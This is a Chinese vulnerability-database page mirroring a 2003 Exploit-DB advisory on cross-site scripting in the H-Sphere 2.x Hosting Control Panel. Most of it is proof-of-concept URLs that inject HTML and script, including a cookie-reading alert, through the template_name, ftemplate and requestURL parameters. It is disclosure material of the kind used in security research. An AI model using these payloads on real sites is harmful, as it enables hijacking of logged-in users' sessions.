H-Sphere 2.x – HTML Template Inclusion Cross-Site Scripting

H-Sphere 2.x – HTML Template Inclusion Cross-Site Scripting

漏洞ID 1053947 漏洞类型
发布时间 2003-06-09 更新时间 2003-06-09
图片[1]-H-Sphere 2.x – HTML Template Inclusion Cross-Site Scripting-安全小百科CVE编号 N/A
图片[2]-H-Sphere 2.x – HTML Template Inclusion Cross-Site Scripting-安全小百科CNNVD-ID N/A
漏洞平台 Java CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22752
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7855/info

H-Sphere is prone to multiple cross-site scripting vulnerabilities via the HTML template feature in the Hosting Control Panel. HTML and script code will not be filtered from pages which are generated when a request for an invalid or unknown template is made.

This could be exploited if a web user follows a malicious link to a site hosting the vulnerable software that includes hostile HTML or script code. The link may also need to contain the username of a valid, logged in user.

http://www.example.com/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND
XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]&
password=[PASSWORD]

http://www.example.com/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<H1>xss</H1>

http://www.example.com/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<IFRAME>

http://www.example.com/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<h1>XSS

http://www.example.com/[PATH TO
H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template
_name=<script>alert(document.cookie);</script>

相关推荐: Seminole Webserver Invalid Request Heap Corruption Vulnerability

Seminole Webserver Invalid Request Heap Corruption Vulnerability 漏洞ID 1102147 漏洞类型 Design Error 发布时间 2002-05-11 更新时间 2002-05-11 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享